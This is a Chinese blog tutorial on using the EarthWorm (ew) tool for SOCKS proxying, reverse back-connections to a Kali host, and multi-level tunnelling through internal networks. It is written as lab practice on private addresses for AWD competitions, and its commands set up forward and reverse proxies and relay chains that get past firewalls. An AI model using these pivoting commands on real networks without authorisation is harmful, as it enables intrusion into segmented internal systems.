端口转发及工具的使用

上一篇SSH及端口转发详细的讲解到了正向代理和反向代理的概念以及使用方法,但它们使用的前提都由一个,需要ssh口令。下面介绍一下不用ssh口令的端口转发方案。这里使用到的工具是earthworm。

下载链接:http://rootkiter.com/EarthWorm/ (需要翻墙)

该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待。

实战一 :

利用ew做最简单的正向代理,其实就是大家最常用的所谓的ss

1
2
3
4
5
6
unzip ew.zip
file /sbin/init (查看linux位数)
file /lib/systemd/systemd
chmod 777 ew_for_Linux32
./ew_for_Linux32 -s ssocksd -l 2333 (侦听0.0.0.0:2333)
netstat -pantu|grep 2333 (查看是否侦听成功) #都在msfadmin@192.168.108.142中进行

这里B具有公网ip且具有内网ip

image.png

image.png

image.png

实战二

利用ew做最简单的反向代理

1
./ew_for_linux64 -s rcsocks -l 1080 -e 1234        #在kali(A)里面执行
1
./ew_for_Linux32 -s rssocks -d 192.168.108.150 -e 1234       #在msfadmin@192.168.108.151(C)执行

这里msfadmin@192.168.108.151(C)反向连接kali(A)

image.png

image.png

image.png

image.png

实战三

实现复杂内网环境下的跨网段多级穿透:

1
./ew_for_Linux32 -s ssocksd -l 1080          #在msfadmin@192.168.108.142(B)执行
1
./ew_for_Linux32 -s lcx_tran -l 1090 -f 192.168.108.142 -g 1080  #在msfadmin@192.168.108.151(C)执行

image.png

image.png

image.png

实战四

实现复杂内网环境下的跨网段多级穿透

1
./ew_for_linux64 -s ssocksd -l 1080 -e 1379           #在kali里面执行
1
./ew_for_Linux32 -s ssocksd -l 2345               #在msfadmin@192.168.108.151执行
1
./ew_for_linux64 -s lcx_slave -d 192.168.108.150 -e 1379 -f 192.168.108.151 -g 2345    #在msfadmin@192.168.108.142执行

image.png

image.png

image.png

实战五

多级内网轻松穿透

1
./ew_for_linux64 -s rcsocks -l 1080 -e 1235       #在kali(A)中执行
1
./ew_for_Linux32 -s lcx_slave -d 192.168.108.150 -e 1235 -f 192.168.108.151 -g 3456     #在msfadmin@192.168.108.142执行
1
./ew_for_Linux32 -s lcx_listen -l 3456 -e 1236       #在msfadmin@192.168.108.151(C)中执行
1
./ew_for_Linux32 -s rssocks -d 192.168.108.151 -e 1236         #在msfadmin@192.168.108.152中执行

image.png

image.png

image.png

今日小结

经过一天的内网端口转发学习,希望哪天AWD的时候能够用得到嘻嘻,欢迎各位师傅纠错!:)

I’m waiting for you! Good night

-------------本文结束感谢您的阅读-------------